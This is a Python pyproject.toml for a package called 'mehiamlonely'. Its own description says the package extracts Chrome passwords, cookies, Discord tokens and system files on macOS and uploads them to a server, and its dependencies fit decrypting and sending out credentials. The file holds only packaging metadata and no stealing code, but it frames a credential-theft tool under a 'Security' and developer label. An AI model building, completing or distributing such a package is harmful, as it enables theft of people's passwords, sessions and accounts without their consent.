[build-system]
requires = ["setuptools>=61.0", "wheel"]
build-backend = "setuptools.build_meta"

[project]
name = "mehiamlonely"
version = "0.1.0"
description = "macOS File System and Chrome Data Extractor - Extracts Chrome passwords, cookies, Discord tokens, and system files, uploads to FastAPI server"
readme = "README.md"
license = "MIT"
authors = [
    {name = "Your Name", email = "your.email@example.com"}
]
maintainers = [
    {name = "Your Name", email = "your.email@example.com"}
]
keywords = ["chrome", "password", "extraction", "macos", "security", "data", "filesystem"]
classifiers = [
    "Development Status :: 4 - Beta",
    "Intended Audience :: Developers",
    "Operating System :: MacOS",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Programming Language :: Python :: 3.11",
    "Programming Language :: Python :: 3.12",
    "Topic :: Security",
    "Topic :: System :: Systems Administration",
    "Topic :: Utilities",
]
requires-python = ">=3.8"
dependencies = [
    "httpx",
    "cryptography",
    "keyring",
    "pycryptodome",
    "aiofiles",
    "psutil",
]

[project.optional-dependencies]
dev = [
    "pytest",
    "pytest-asyncio",
    "black",
    "flake8",
    "mypy",
]

[project.urls]
Homepage = "https://github.com/yourusername/mehiamlonely"
Documentation = "https://github.com/yourusername/mehiamlonely#readme"
Repository = "https://github.com/yourusername/mehiamlonely.git"
Issues = "https://github.com/yourusername/mehiamlonely/issues"

[project.scripts]
mehiamlonely = "mehiamlonely.cli:cli_main"

[tool.setuptools]
package-dir = {"" = "src"}

[tool.setuptools.packages.find]
where = ["src"]
include = ["mehiamlonely*"]

[tool.setuptools.package-data]
mehiamlonely = ["*.md", "*.txt", "*.yml", "*.yaml"]